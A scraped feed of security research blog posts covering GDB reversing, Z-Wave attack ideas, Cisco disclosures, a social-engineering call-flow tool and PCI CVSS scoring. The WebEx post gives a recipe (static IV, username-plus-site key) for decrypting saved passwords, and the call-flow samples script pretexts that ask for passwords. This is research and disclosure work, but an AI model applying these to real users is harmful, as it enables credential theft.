Quantcast
Channel: Open Security Research
Viewing all 107 articles
Browse latest View live

Reversing Basics Part 3: Dynamically Reversing main()

$
0
0
By Robert Portvliet.

This is the thrid blog post in a four part series. In the first post, we reviewed the structure of a simple C program. In the second post, we reviewed how that program translated into assembly. In this post we’ll cover dynamic analysis of the main() function with GDB. We’ll run our simple program in GDB and take a look at what happens along the way.

As a refresher, make sure you've compiled our source code with the “-g” argument so debugging info is included in the compiled executable.

gcc -g -o basic basic.c



Ok, so first things first, let’s fire up GDB

gdb -q ./basic



This will leave you at the (gdb) prompt.

First off, I should mention that GDB uses AT&T syntax by default, so if you wish to use Intel syntax (as I do), you can change it by using the command:

set disassembly-flavor intel



Secondly, we’ll cover some of the basic commands in GDB, but if you want to see a bunch more type help and it will list them out for you. Even better is to type help, and a category, such as help show or help info. This will show you all the subcommands under that category.

A couple interesting things we can do with GDB first. We can use the disassemble command to disassemble parts of, or our entire program. We can also use shortcuts. Type just enough of the command that GDB knows what you want to do, and hit enter. GDB also has tab autocomplete; start typing your command, and then hit tab. GDB will either finish the command or show you the possible options.

Another thing we can do is list out our source code, using the list command. By default, the list command will print out 10 lines of source code from the position you give it. Our program is 15 lines long, so if we want to see it all in one shot, we need to change the default with the command set listsize 20. You can view the default list size with the command show listsize.

Here's the output of the list command, with line 1 specified as the starting point



Ok, before we run our program, let’s set a couple break points. Set one at the beginning of main(), which is 0x080484bc, and at the beginning of func() which is 0x08048484. We can set these as follows:

break *0x080484bc
break *0x08048484



The asterisk denotes that the argument passed to break is a memory address.
We can view our breakpoints by typing info break, and we can delete breakpoints by typing delete with no arguments to delete them all, or delete and the number of the breakpoint we want to delete. Such as delete 11. Instead of deleting them, we can simply enable and disable them by typing, enable or disable and the number of the breakpoint.

Here we show the output of disassemble func. Then, we are setting a break point at 0x08048484, the beginning of func(). Finally, we are viewing the breakpoints we have set.



One last thing, set the following to display the status of the EBP, ESP, and EIP registers each time we hit a breakpoint:

display /x $esp
display /x $ebp
display /x $eip



Ok, let’s run our program. We can run it by typing run, and we can give it an argument also. Let’s type run AAAA. The program will run and we’ll hit our first break point at 0x080484bc. We can confirm this by typing disas main, which shows that we’re on the first line of the main() function.

Here's line one of the main() function. It’s worth noting that the instruction the arrow points to in disassemble main has not executed yet. When you step through a program the arrow points to the next instruction to be executed, not the one that has just been executed.



We also see that EBP is at 0xbffff5c8, and ESP is at 0xbffff54c. So, we might ask ourselves, how large is our stack frame currently? Well, C8-4C=7C or 124 decimal. So, it looks like our stack frame is 124 bytes (right now).

We can also confirm this another way. Just type x/w $ebp-124 to view the address at 124 bytes down the stack from EBP. It turns out to be the address in ESP. We’re also still in the function prologue for main(), and ESP hasn’t been copied into EBP yet, so we’re actually not looking at the size of the stack frame for main() right now, we’re looking at the previous stack frame.

Let's confirm the size of the stack frame at the time of the first instruction in main().



Incidentally, you see the command x/w being used above to examine memory locations. Here is a quick (and incomplete) rundown on using the ‘x’ command.

  • x/s [location] Allows us to examine the location as a string
  • x/w [location] Allows us to examine the location as a WORD (4 bytes)
  • x/i [location] Allows us to examine the location as an instruction


Anyway, we could type ‘c’ or continue, and the program would run until it hit the next breakpoint, but we want to go one instruction at a time so we’re going to go with stepi instead.

So, once EBP gets pushed onto the stack in the first instruction, the value of ESP now becomes 0xbffff548, and C8-48=80 or 128 decimal, so our stack grew by 4 bytes or one DWORD (Remember, each instruction is 4 bytes).

In line 1 we push EBP onto the stack. We start with a stack size of 124 bytes (from the previous stack frame). Then EBP is pushed onto the stack, resulting in a stack size of 128 bytes (Each DWORD is 4 bytes):



In line 2 ESP gets copied into EBP as part of the function prologue, and our new stack frame is created. It’s flat as a pancake right now with EBP and ESP at the same memory address:



In line 3 the stack gets aligned in a 16 byte boundary, which also has the effect of moving ESP 8 bytes down the stack. For a quick explanation of stack alignment, check out this article.



In line 4 we move ESP 16 bytes down the stack to allocate some space we will need going forward



In line 5 we’re taking the string from 0x80485ce and pointing ESP at it. We can confirm what value is there, by using the command x/w 0x80485ce



We can confirm that ESP now points at 0x80485ce by using the command x/w $esp.



We’re going to use the nexti command to jump over the puts() function in this case. When we get to func() we’ll use stepi to dive in, but right now I’d like to get to the next instruction in main. That’s the difference between the two, nexti skips over functions, while stepi dives in.

By the way, puts() is just a compiler optimization of printf(), and the result of puts() was the string "Passing user input to func()" was printed to stdout.

Now that we’re past puts(), on lines 7 and 8 we move the value at ebp+0xc or 0xbffff749, which is argv[0] into EAX, then add 0x4 to EAX which gets us to 0xbffff758. This is argv[1] containing “AAAA”, the argument we passed to the program at runtime.



After line 7 has executed we can see that EAX points to 0xbffff749, which contains argv[0] or "/root/bo/basic":



After line 8 has executed we can see that EAX now points to 0xbffff758, which contains argv[1] or "AAAA":



Now on line 9 we get to an interesting instruction. As of line 8 EAX only points to argv[1], as we can prove by using the command x/s $eax. No luck getting back “AAAA” unless we do x/w $eax to get the memory address it points to (0xbffff758), and then use x/s 0xbffff758 to view the string at the memory address (“AAAA”).



However, after we use stepi to execute ‘mov eax, [eax]’ we can then use x/s $eax and the string “AAAA” truly is “in” EAX now. On line 10 we point ESP to the location of the contents of EAX. We’re basically pointing it at that memory address. We can verify this by using x/s $esp. We see that we get no string of “AAAA” back, but using x/w $esp gives us the memory address, 0xbffff758, that contains argv[1], our string of “A’s”.



In the next installment we’ll dive into the func()/ function and finish running through the rest of our simple program in a debugger. Hope you enjoyed!


Potential attack vectors against Z-Wave®

$
0
0
By Robert Portvliet.

A couple years ago I was doing some research on Z-Wave, and after sifting through what was publicly available regarding the protocol I came up with some ideas as to how it might be attacked. My colleague Neelay Shah and I even worked on some code for it. However, at the time I concluded that I needed a USRP to make forward progress into writing a tool that could sniff Z-WAVE traffic, which was/is pretty important for a number of attacks. Not wanting to drop the $ at the time, I just shelved what I had for the moment, and figured I’d get back to it later. Well, you know how that goes, so here we are two years later and I’m likely not going to get around to it. Plus there seems to be a Blackhat talk on it this year, so I’m just going to dump what I have in this blog post, and if anyone finds it useful, so be it :)

For those not familiar with it, Z-Wave is a short range wireless protocol, which operates in the 900MHz ISM band (in the US), and is most commonly used for home automation. It is also supported by a number of alarm system and lock manufacturers. What follows is more or less a summary of what I was able to find publicly available regarding Z-WAVE, and what attacks might be possible against the protocol.

Background

When I began searching the internet for information on the protocol, I discovered that it seemed very little public security research had been done regarding Z-Wave. Even since then, the only research released is what Dave Kennedy and Rob Simon included in their Defcon 19 presentation.

There does however, exist a fairly active community of home automation hobbyists who have reversed engineered portions of the protocol, primarily using serial sniffers. These enthusiasts have compiled a fairly large amount of data on the protocol through this reversing, and also from documents published by various vendors that detail parts of the protocol as it pertains to their specific products. There is also some Zensys documentation available on these sites such as the Z-Wave module selection guide, the Z-Wave protocol overview, and the Z-Wave node type overview and network installation guide. These hobbyists also publish a rather steady stream of blog posts and tutorials on how to write code that will allow one to interact with Z-Wave controllers and devices. Some of the best are available here:



One of the most useful things developed by the home automation community is an open source C++ library called OpenZ-Wave. Its associated Google Group is very active, and a good place to do research & ask questions. There was also another project which began to develop a Python wrapper known as Py-OpenZ-Wave with the goal of even further simplifying developing Z-Wave projects. Unfortunately, it seems that the Py-OpenZwave project hasn’t gotten very far since that time, but it’s a good idea nonetheless.

Utilizing this information it is possible to quickly gain a fairly decent understanding of the protocol and how its various components interoperate. A detailed description of the protocol is outside the scope of this post, but one of the best descriptions of the protocol publicly available can be found in the paper Catching the Z-Wave, by Mikhail Galeev. Also, as previously mentioned, the Z-Wave protocol docs are easily found on the internet. However, it should be noted that all of this documentation is from v4 (400) of the protocol and as such is slightly dated, but is still exceptionally useful.

Hardware

There are a couple hardware items worth having to start off with. I was using a AEON Labs Z-Stick 2, which is ~ $40. There is also the AEON Labs Z-Stick Lite, but it’s not flash able and appears to be the same price as the regular Z-Stick now.

The other interesting piece of hardware is the Razberry Pi, which is a Z-Wave® ZM3102 Module for the Raspberry Pi. However, the downside is the Z-Way software it comes with is closed source, so you are limited what you can do with the API provided to you.(Unless you reverse their binaries of course… ) There is some doc available here. You can grab the Z-Way bundle here

A USRP would be a huge help if you don’t mind spending the coin. In truth the bus series would probably do the job at ~ $600 + cost of the daughter board. I’m waiting for the HackRF (frequency range 30 MHz to 6 GHz) to be publicly available. It will likely be a big help for stuff that like this. The BladeRF (300MHz - 3.8GHz RF frequency range) doesn’t look bad either. It appears that some folks have been playing around with Z-Wave with the RTL-SDR, which is great for RX only, but has no ability to transmit.

Potential Attack Vectors

Ok, so enough of that. Here is what I came up with in terms of potential attack vectors.

Sniffing Z-Wave traffic

The first and obvious vector that came to mind was to sniff the Z-Wave network traffic in order to discover the HomeID, NodeID’s and other information about the network. This would be the easiest way to attack a network and could be done from a distance with a high gain 900mhz antenna. Unfortunately, no open source sniffers have yet been developed by the community.

Sigma sells a sniffer called the ‘Zniffer’ as part of their Z-Wave® Home Control Development Kit for about $3000 or so. However, you have to sign an NDA if you buy their devkit. Copies of their SDK, which include the firmware for the sniffer module, have made it into the wild, but you will still need the hardware to flash it to (and most likely a programmer). Still, it would be easier to design a sniffer by reversing the current firmware I suppose..

I was also able to locate a Lagotech HIP-22 sniffer for sale on EBay, and you can actually purchase it from a few places for ~ $150 but it also requires the Lagotek ‘HIT’ software to function.

As stated previously, a USRP and GNU-Radio could be used to develop a sniffer as well. This would require figuring out the protocol from the ground up, and there’s something of a learning curve to GNU-Radio, but if you’re already a software radio guy you’re ahead of the game in that area. The RTL-SDR is another possibility, but its RX only so you won’t be able to inject any packets. Again, I’m hoping to get my paws on a HackRF in the not too distant future, which I’m hoping will bridge the gap here.

Unpairing nodes from the network

An attack vector that I was investigating was the ability to unpair nodes from the network from a distance as a denial of service attack. However, the problem with unpairing a node from the network is it requires the action to be initiated from both ends. This is commonly accomplished by pressing a button on the node in question and on the remote or the primary controller. An attacker would also need to utilize a high gain 900mhz antenna as pairing is done using very low power, requiring the devices being paired to be within a proximity of 3' to one other. There is also full power inclusion which works with devices that support it, but that only has a range of 20' (unobstructed) so the attacker would still require a high gain antenna. It may be possible to spoof the unpairing frames to the node, making them appear to come from the Z-Wave controller, but this still would not solve the problem of placing the node in the proper ‘listening’ state necessary to unpair it from the network. As stated previously, this has to be initiated on the node itself, making this attack largely impractical.

Attacking and unlocking door locks:

A rather desirable attack would to find a way to cause a Z-Wave enabled door lock to open by sending it unauthorized traffic containing a command to unlock. What makes this a difficult attack is that door locks, like those made by Schlage, utilize the encryption command class in Z-Wave which employs AES128, and are also supposedly using a onetime value for each frame sent to/from the door lock. However, they do have a weakness that an attacker may be able to exploit, but it requires a sniffer and for the attacker to be present when the locks are being added to the Z-Wave network. The locks perform a key exchange with the controller when they join the network and if an attacker were to be there with a sniffer when this takes place they may be able to intercept this key and use it to encrypt\decrypt traffic. This window is obviously very narrow, but might be able to be abused by a home automation installer with malicious intent.

Denial of service attacks

An attack that is almost always possible when dealing with wireless communications of any sort is denial of service via jamming. Jamming is accomplished by transmitting a steady stream of ‘noise’ on the same frequency as the intended victim. Z-Wave operates in the 900mhz spectrum and a quick Google search reveals several 900mhz jammers commercially available for only a few hundred dollars, or you could build your own. The manufacturers claim about 30 meters effective range, but this could be increased dramatically using an amplifier. This attack would not require any knowledge of the target Z-Wave network other than its general location and could be sustained indefinitely.

Brute-forcing the HomeID

After reviewing all the possible attack vectors and taking into account the feasibility of each, as well as the time necessary to implement them, I decided the most practical plan of attack would be to write a tool that would brute force the HomeID. The 32bit HomeID value is required to send and receive traffic to a specific Z-Wave network. The idea would be to write a bit of code that that would iterate through this value and for each iteration send a single frame to a NodeID on the network likely to exist, such as NodeID 0x02, and then listen a few milliseconds for an acknowledgment frame (ACK).

My colleague Neelay Shah offered to write the code, and we utilized information regarding how to craft and send Z-Wave frames from http://www.digiwave.dk/en/programming/the-z-wave-protocol-in-csharp/, as well as sample code provided by same, to help craft the tool which would perform the attack. This sample code was modified and then integrated with our code that would iterate through the 32bit HomeID which comprises the first four bytes of the Z-Wave frame. This code was tested and found to be functional, but unfortunately had one oversight that proved difficult to address. The oversight was that the HomeID cannot be changed in the Z-Wave frame to be a value different from the value of the HomeID set in the EEPROM on the Z-Wave dongle. If this occurs, the driver does not know how to handle it and will not send the frame. At first glance this seems like a fairly easy challenge to surmount, simply update the value in the EEPROM as well. The problem with this approach is that there are 4.3 billion possible values in the 32bit HomeID and an EEPROM will only take about one million writes (or less, depending upon quality), before it wears out, long before the correct value for the HomeID would be discovered. A possible solution to this problem would be to investigate if the HomeID value could be modified in memory instead, but it also seems to not be possible to modify the HomeID in memory when using a Z-Wave dongle. So, the most practical way to approach this attack appears to once again be to use SDR to create the tools that provide the functionality necessary to perform the attack.

If one were to implement this attack utilizing SDR, there still remains the issue of brute forcing 4.3 billion possible values, which could potentially take hundreds of hours. However, there exists the possibility of enhancing this attack by narrowing down the number of values an attacker would need to iterate through. Manufacturers such as Motorola are allocated unique blocks of HomeIDs by Sigma. If these HomeIDs are allocated in sequential order and one was able to collect the HomeIDs from several devices made by that particular manufacturer, it may be possible to narrow the values needing to be brute forced to a few million, which would take far less time to attack.

I am including the code that Neelay wrote for the HomeID brute forcing. As I said, it’s not really effective unfortunately, but I’m including it in case it is useful to anyone.



Additional Resources

Quick Reversing - WebEx One-Click Password Storage

$
0
0
By Brad Antoniewicz.

Cisco's WebEx is a hugely popular platform for scheduling meetings. You can conduct video and voice calls, screen sharing, and chat through the system. Meetings are usually created via a Web Portal were the user defines when the meeting starts, how long it goes for, and what services (e.g. screen sharing or just voice) their meeting will leverage. WebEx also provides a One-Click Client that offers standalone meeting scheduling and outlook integration so that users can avoid the Web Portal.

The One-Click Client has the ability to save a user's password, so I decided to take a quick look at that functionality - in about an hour I was able to determine the storage, reverse the method it used to encrypt the password, and write a proof of concept tool to decrypt the local storage of the password. The aim of this blog post is to document that process and maybe encourage you to do some reversing!

Process Monitor

Usually the first step when evaluating client applications, is to get an understanding of what file system changes the application is performing (read/writes). This is especially true when you're looking for something thats being stored (in this case, the saved password) because stored info is usually written to a file, database, or within the Windows registry.

Process Monitor is one of those core tools that everyone should have handy and is perfect for this use case.

At this point in the process, we'll focus on One-Click's ptInst.exe executable. It's run during the initial install for One-Click and asks the user for username/password/server URL and if the application should save the password. With ptInst.exe running, we can launch Process Monitor.

First step is to create filter for the executable to reduce getting overwhelmed with information from other processes. Remove all existing filters and then create one to include all processes whose name is "ptinst.exe":



Next up, provide the application a username, password and URL, and tell it to save the password. As soon as the login button is clicked, Process Monitor will show a ton of activity. The first thing that catches my eye is that there are a bunch of writes to the resp.xml XML file.



It's common for applications to store configuration information in an XML file, so maybe we'll get lucky with this one.



resp.xml does contain lots of data, but unfortunately there are 6 stars in place of the actual password (password length is greater than 6, fwiw). So back to Process Monitor.

Next thing that may catch your eye is a number of queries to the Registry. It's very common to see application using the registry to store various information. These queries are particularly interesting because they contain the word "Password":



This is a pretty good indication that the password and password length are stored in the registry. To confirm, check the registry keys themselves. It turns out that the HKCU\Software\WebEx\ProdTools\Password key stores some hex value that isn't the cleartext password, and HKCU\Software\WebEx\ProdTools\PasswordLen contains the length of password.

At this point, we need to determine what the value of HKCU\Software\WebEx\ProdTools\Password is. It's probably the password, but somehow obfuscated or encrypted and deciphering isn't obvious.

IDA Pro

IDA Pro is another core tool. It's really the defacto tool for reverse engineering. Freeware and Evaluation versions are available and should be completely capable if you're following along (although I am using the paid version).

Strings

Programs often contain constant string values to be used when performing certain functions. For instance, ptInst.exe will likely always use the same registry keys (e.g. HKCU\Software\WebEx\ProdTools\Password), so those actual strings should be stored somewhere within the binary. There are a number of programs that allow you to search for strings within a binary, we'll use IDA (View - Open SubViews - Strings):



If you search through the string list, you'll notice the registry key names aren't there. This is because by default, IDA will only show zero terminated ASCII C strings. We'll learn a little lower that our strings are passed to a Unicode Windows API function.

To show Unicode strings within IDA, right click the Strings tab and go to "Setup". Next select "Unicode" under "Allowed String Types":



Scrolling through the Strings Window a second time will reveal the unicode encoded key name we're looking for: "Password". Double clicking it will open IDA View-A and bring us to the data segment in the binary where the string is located. You'll notice that right above the unicode entry, at the same address, IDA automatically gave this location a variable name, "aPassword".



By selecting "aPassword" and pressing the "x" key, you'll see all of the cross references to that variable name - This is everywhere its used in the program.



We just need to find where the registry key is either set or read and we'll likely see a call to some function nearby that decrypts it. The second reference, sub_34161C+1EB looks to be setting the value since a few instructions after the reference, a call to RegSetValueExW() is made.



RegSetValueEx()

An observation to make is that the program is calling RegSetValueExW(). The "W" stands for "wide" which indicates the program is using the Unicode version of the RegSetValueEx() API function. This speaks to why we needed to configure our Strings Window to show Unicode strings. Had the function been RegSetValueExA(), we'd be using the ANSI version.

If we look at the RegSetValueEx()MSDN Page we see that the fifth value passed to the function is a pointer to the data which is to be stored within the registry key. IDA helps us out a bit by showing the same data types for each of the values being pushed onto the stack as the MSDN entry. Looking at the fifth value pushed onto the stack (working backwards from the call to RegSetValueExW()), we see lpData, which is stored within the EAX register. It's value is loaded into that register by the prodceeding call, where we find its actually the value [ebp+428h+var_428]. If we highlight that, then look at the previous references we'll discover that this value is always used above as the destination in an earlier call to memcpy().



So this means that it's likely the value being set for Password registry key is the result of the memcpy(). We'll need to realign our trace to follow the source variable of that memcpy() if we want to figure out how our saved password is stored.

To the Source

If we highlight the Src to the memcpy(), or [ebp+428h+Src], we'll see its used above and pushed onto the stack:



The function call after a bunch of pushes is to sub_3412bb. If we look at it, its a pretty simple function and doesn't really alter the stack :



This means our Src is still on the stack and may be used by the following function call to the CryptoData() exported function. CryptoData() sets up a stack frame and then does a quick jump to sub_342332:



Function sub_342332 starts to look interesting. First up, it has a bunch of arguments, this means that just by eyeing it up, we can guess that our Src will likely be used. If we count the number of elements pushed onto the stack, then look at the number of arguments IDA identified in the function, we could get an idea:



Looks like they all line up. Also make note of the cmp [ebp+arg_1c], 0. We can clearly see that the calling function sets that to 1, so we know that we'll be taking the negative branch on the jz below.

Keys!

The negative branch brings us to sub_34227b which looks like gold. From a quick overview, we see that there is some constant value being loaded into an array or structure:



And then there are calls to AES_set_encrypt_key() and AES_ofb128_encrypt().A quick search will reveal both of these functions are part of the OpenSSL libraries. What's even better is that someone else has already implemented these functions in an open project. For whatever reason the OpenSSL documentation doesn't have full coverage of both of these functions, so this project helps to reduce the effort in guessing what the higher level code looks like and ultimately what's needed to reimplement it.

AES_set_encrypt_key

First up I wanted to identify what values were being passed to AES_set_encrpyt_key(). I knew its arguments were something like:

 AES_set_encrypt_key (const unsigned char *someKey, const int size, AES_KEY *keyCTX)



To make life easier, I used WinDBG, set a breakpoint on the call, and inspected the memory at that location. What I discovered is that the key being used was a combination of these two registry keys:

  • HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
  • HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName


For UserName I had braanton and for SiteName I had siteaa.webex.com/siteaa. When looking at WinDBG, the value being passed to AES_set_encrpyt_key() was:

 braantonsiteaa.webex.com/siteaab



Which led me to believe the key was essentially the UserName value concantenated with the SiteName and repeated until it filled 32 characters (which accounts for the trailing "b").

AES_ofb128_encrypt

A little searching revealed the arguments for AES_ofb128_encrypt should be something like:

 AES_ofb128_encrypt(*in, *out, length, *key, *ivec, *num);



This is where that big constant value comes in. If you look at it fully assembled, you'll find that it is:

 123456789abcdef03456789abcdef012



This gives us everything we need to encrypt the password, our psuedocode for the assembly in sub_34227b would look something like:

 IV = 123456789abcdef03456789abcdef012;
password = "some value";
key = [UserName + SiteName repeated to 32 chars];
num=0;

AES_KEY keyCTX;

AES_set_encrypt_key (key, 256, &keyCTX);

AES_ofb128_encrypt(password, out, sizeof(password), &keyCTX, IV, &num);



Decrypting

AES_ofb128_encrypt() uses output feedback (OFB) which makes the decryption process nearly identical to the encryption process. All we have to do is provide the encrypted value (i.e. the one stored in the Password key) with the appropriate length (i.e. the one stored in the PasswordLen key) and we'll be able to decrypt it. This all comes down to the static IV and UserName/SiteNamekey values. To demonstrate this, I wrote the following Proof of Concept code:



You'll need to edit the source and manually define the appropriate values for regVal and key then just compile and run:

 brad@wee:~/onedecrypt$ gcc -o webex-onedecrypt -lssl webex-onedecrypt.c
brad@wee:~/onedecrypt$ ./webex-onedecrypt
Reg Key Value = cc 6d c9 3b a0 cc 4c 76 55 c9 3b 9f
Password = bradbradbrad



Contacting Cisco

As always, I contacted Cisco and let them know of my findings - and as always they were really responsive and welcoming. This issue is being tracked under Cisco PSIRT Case PSIRT-0219916903 if you want more info!


Hope you liked this, if so - Follow me on twitter - @brad_anton

Cisco ACS Local PAC File Write Redirect

$
0
0
By Brad Antoniewicz.

A couple months ago I came across a sort of interesting bug in the CSUtil.exe. I'd say the overall severity of the vulnerability is pretty low, but I'm wondering if anyone can think of creative ways to exploit it. In this post I'll describe the vulnerability and if you can think of a cool way to exploit it, let me know in the comments below.

CSUtil.exe

CSUtil.exe is a command line utility included within Cisco ACS for Windows. It can preform a variety of functions to parse data from the ACS database and is often used to manually backup the database. It's most commonly invoked by a user with appropriate administrator level rights and output files are stored by default within the directory from which the utility was ran.

File Write Redirect

The vulnerability is introduced when issuing the "-t" option which retrieves a local user's PAC and writes it to a file. During the export process, CSUtil.exe writes a string to a temporary file, tmpUserFileName.txt, then later uses that string as the file name to write the PAC file to. If someone else writes an alternate string to the tmpUserFileName.txt after CSUtil.exe has written the initial string, it's possible to redirect the location in which the PAC file gets written to.

This is demonstrated in the following Video:



Some important notes to mention:

  • tmpUserFileName.txt is written to the same directory where the tool was run from and thus the attacker must have appropriate permissions to write to files within that directory
  • This attack appears to be very much timing related since the attacker would need to overwrite the tmpUserFileName.txt file contents after CSUtil.exe is run but before it completes
  • It is possible to overwrite existing files at potentially arbitrary locations, but they must end in ".pac".

So... In my mind, this is a relatively low risk issue given all of the restrictions. What do you think? Can you make it a high?

Contacting Cisco

As always, I contacted Cisco and let them know of my findings - and as always they were really responsive and welcoming. This issue is being tracked under Cisco PSIRT Case PSIRT-0354447345 and Bug ID CSCug61874 if you want more info!

FSFlow - A Social Engineering Call Flow Application

$
0
0
By Brad Antoniewicz.

A few months ago I was thinking about ways to improve and standardize social engineering calls. It's a difficult thing to do, conversations can go almost anywhere over the span of a phone call which makes defining a specific process hard, if not impossible. As I explored the idea, I was reminded of a high school friend who had a telemarketer job one summer. He told me how nearly everything they said was presented to them on a screen in front of them, and they would navigate through a process flow as the call progressed. I decided to use this model and apply it to social engineering in a tool called "FSFlow". Now this is mostly a proof of concept tool but it's fully functional so I encourage you to try it out. Here's what its all about.

Judging User Responses

One of the major pains with designing an application like this is judging the response of a user. You can never predict the user's exact response so the measure of the response needs to be somewhat abstracted. Our approach here is to identify if the user's response is positive or negative. For instance, if you say "Hi, How are you?" and they say "Great!" - that's a clearly positive response, while "What do you want." is a bit more negative. Similarly, if you ask someone "What is your password?" and they provide it to you, that would be positive, while anything else is likely to be negative.

The difficult thing here is that many user responses aren't easily categorized as negative or positive; perhaps a sliding scale would be more appropriate - but that would create tons of possible branches, making a complete call flow impractical.

Another really interesting option that was suggested to me is using voice analysis to identify how the user feels. The person who suggested the idea used to work for a company that would try to identify if a person was happy, sad, felt helped, etc... after a customer service call. It would be interesting to implement this in the future .

Logging

Another hugely important thing we wanted to do with FSFlow is capture how the call progressed. The call log records how the call progresses and what information is obtained at what points in the call flow. You could potentially use this information to determine where users need more security awareness training - e.g. every user was willing to disclose their IP address, but only some gave their password or even when asking this specific question, users got suspicious and ended the call.

While we don't do this now, another suggestion we received was to record the conversation or integrate it with Skype - so that the calls can be reviewed later on.

The Interface

FSFlow's interface is meant to be as simple and straightforward as possible so that the caller is not overwhelmed or distracted during the call. During the planning phase of the application, I created a sketch to outline what the interface should look like:



For the first release, we slimmed things a bit, resulting in 4 major areas: the statement pane, response pane, objectives and call variables:



Statement Pane

The statement pane is the actual wording the caller says during the call. This is your social engineering attack. The important thing about this pane is that the wording is clear and easy to read aloud. You'll notice in the screenshot above that there are placeholders, e.g. "[TARGETNAME]", this are call specific variables that are populated once you populate the Call Variables pane (described below).

Response Pane

Directly under the statement pane is the response pane compromised of the "Negative Response", "Positive Response", Busted" and "Recovery Mode" buttons. Each of these buttons progress the call to the next flow state. The "Recovery Mode" button is meant to gently direct the call to an end without aggravating the callee. The "Busted" button is more of an "Ok, you got me" response where you let the callee know that this is a social engineering call, they should contact the point of contact for the company (the person that hired the caller), and to please not tell the coworkers of the test :)

Objectives

The Objectives pane is where the caller can log what elements of information they're able to obtain during the call.

Call Variables

Call Variables customize the flow to each individual call. Before the call starts, the caller populates these variables so that the placeholders in the statement pane are replaced with pertinent information. It also serves as a reminder to the caller to who they are pretending to be!

The Call Flow

The most important component of FSFlow is its XML based call flows. The idea behind the call flow is that they could be easily shared to be improved and make standardized attacks. Let's look at sample.xml that's included with the application.

The entire call flow is included within a <CallFlow> block which takes one attribute, name. Within the CallFlow block, you have Objective, CallBlock, and FlowBlocks

Objectives

Defining objectives is pretty straightforward:

<Objective>Login Username</Objective>
<Objective>Login Password</Objective>
<Objective>PIN</Objective>



CallBlocks

A CallBlock is effectively a container for an individual statement. These statements are then linked together within the FlowBlock below. Place holders can be anything you'd like, as long as they're wrapped in brackets. FSFlow analyzes the flow on start up to populate the "Call Variables" pane.

<CallBlock name="Introduction">
<statement value="Hello [TARGETNAME], *PAUSE* My name is [CNAME] from [CROLE]"/>
</CallBlock>
<CallBlock name="Website Problems">
<statement value="I'm having trouble logging into the [WEBSITE] application. Can you help me? *PAUSE* [POC] told me to go to [URL] and login, but I get a strange error. *PAUSE* Can you login?"/>
</CallBlock>



The "Busted" Call block is a static value used throughout the call:

<CallBlock name="Busted">
<statement value="I'm sorry to bother you. Actually I work for Foundstone, a Division of McAfee. We were hired by your company to perform 'Social Engineering' testing. You can contact [POC] if you need to confirm this. Since I'm conducting this testing, I'd ask that you don't tell your coworkers"/>
</CallBlock>



FlowBlocks

The FlowBlock links together individual CallBlock and ties them to buttons.

<FlowBlock name="FlowBlock1">
<CallBlockFlow value="Caller Pickup">
<PositiveResponse value="Introduction"/>
<NegativeResponse value="No Answer"/>
<RecoveryResponse value="Recovery Response"/>
</CallBlockFlow>
</FlowBlock>



Todo

The biggest thing that we need to do now is develop solid CallFlows, without them, it's really hard to judge exactly how successful this will be! If you have an idea for a flow, let me know!

Download

You can download FSFlow now!

Have any other ideas? Let us know in the comments below!



Note: Image above is from here

Remote Code Execution on Wired-side Servers over Unauthenticated Wireless

$
0
0
By Brad Antoniewicz.

TL;DR - There's a remote code execution vulnerability that can be exploited via 802.11 wireless to compromise a wired side server. The attacker needs no prior knowledge of the wireless network or authenticated access in order to exploit. Check out the video below to see the exploit in action over a wireless network:



Some Background Info

IEEE 802.1x is a standard that describes a way to authenticate users before they "connect" to a network. This happens at layer 2, before the system is assigned an IP address. Basically, the connecting system (supplicant) communicates via a switch or access point (authenticator) to a back end RADIUS server (authentication server). The supplicant and authentication server communicate using EAP to exchange authentication messages. If all goes well and the user is properly authenticated, the Authentication server sends an "EAP-Success" which prompts the authenticator to allow the user onto the network.

In wired networks, this all happens after the user plugs in their Ethernet cable, while in wireless networks implementing WPA Enterprise, this happens after the standard 802.11 session establishment.



The bottom line is that in both wired and wireless networks the unauthenticated user communicates with the authentication server.

Vulnerability Details

Probably the most important thing to point out is that the remote code execution vulnerability I discovered is in an older version of Cisco Secure Access Control Server (ACS). It's possible that it may be present in newer versions which Cisco is investigating under case PSIRT-1771844416 and bugID CSCui57636.

The vulnerability can be triggered before the user is authenticated, which means that in the case of a wireless network running WPA Enterprise, an attacker just needs to be in the physical proximity of the wireless network to fully compromise the ACS server.

Although there is a communication channel between the attacker and the authentication server when the vulnerability is triggered, it's very difficult to leverage this channel as part of post-exploitation activities. It's more realistic that an attacker would use this vulnerability to establish an reverse shell back via the internet. It may also be possible to redirect the execution flow to result in an "EAP-Success" message (or countless other functions). The video above simply demonstrates code execution. Note that in the video the presence of the wired connection between the authentication server and the attacker is there to show the observer path (how the video was recorded) and the potential reverse shell path; in the case of WPA Enterprise, no wired access is required by the attacker to exploit the vulnerability.

Impact

Besides the obvious impact concerns (e.g. system compromise), authentication servers are particularly sensitive systems. They're usually on privileged network segments, integrated with Active Directory, and can be responsible for VPN authentication. ACS in particular also supports TACACS which could allow an attacker to compromise network devices such as routers, switches and firewalls. For an attacker, compromising the authentication server is a very strong foothold into the environment.

Further Information

As mentioned, Cisco is currently investigating this vulnerability. They've been provided a full working exploit and have been extremely responsive and accommodating thus far. The exploit or any further details will not be publicly released until Cisco has had enough time to determine the full extent of the vulnerability. Stay tuned!

Follow me on twitter - @brad_anton



Accurate CVSS Scoring in PCI ASV Scans

$
0
0
By Vijay Agarwal.

Payment Card Industry (PCI) vulnerability scanning involves having an Approved Scanning Vendor (ASV) perform a vulnerability scan as per PCI DSS requirement 11.2 on all IP addresses/devices etc. which store, process or transmit credit card data. The scan aims to identify both network and web application vulnerabilities. The PCI guidelines detail the process in which these scans should be conducted so we won’t go into detail of that. Instead, we’ll discuss how risk is analyzed and rated once the vulnerability is identified.

Risk Ratings

In PCI ASV reports, risks are calculated based on the Common Vulnerability Scoring System (CVSS2) which is the de-facto scoring standard adopted and well accepted throughout the security industry for calculating the security risk.

The basic rule of thumb for calculating the risk is If CVSS2 score is > = 4.0 then that particular vulnerability will result in non-compliance to PCI and the affected device/IP will be marked as FAILED. CVSS2 scores <=3.9 will result in vulnerability as compliant to PCI.

We have mapped the various risk levels and the CVSS2 scores to help you understand how vulnerabilities are rated.

CVSS2 ScoreRiskCompliance Status
<4.0LOWPASS
>=4.0 and <=6.9MEDIUMFAIL
>=7.0 and <=10HIGHFAIL

References:



Now it should be clear from the above table how the vulnerabilities are classified based on CVSS2 score as per PCI ASV Council, but there is lot of calculation, analysis and verification needed to be done, there are various scenarios/cases where we efficiently need to calculate the CVSS2 score based on the scenario.

